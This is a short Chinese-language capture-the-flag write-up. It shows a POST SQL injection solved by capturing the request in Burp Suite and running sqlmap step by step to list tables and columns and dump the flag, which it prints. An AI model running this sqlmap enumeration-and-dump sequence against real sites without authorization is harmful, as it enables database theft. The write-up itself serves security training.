当输入1的时候会返回成绩
但是在URL中并没有出现GET传参,所以大概率是POST了。
需要用我们的工具sqlmap
在这之前,我们需要用Burp Suite抓包。
发送到重放器,右键,复制到文件
打开是这样的,好了主备工作完成,打开sqlmap
L:\gj\sqlmap>python sqlmap.py -r "1.txt"他说目标接口id存在高危sql注入漏洞
可以注入我们就进行下一步,爆表
python sqlmap.py -r "1.txt" --tables出来了数据库名和表名,继续爆列名。
ython sqlmap.py -r "1.txt" -D skctf -T fl4g --columns得到列明了,提取数据
python sqlmap.py -r "1.txt" -D skctf -T fl4g -C skctf_flag --dumpflag{7bc17ff3453fef76f405bf3fb68cc9a9}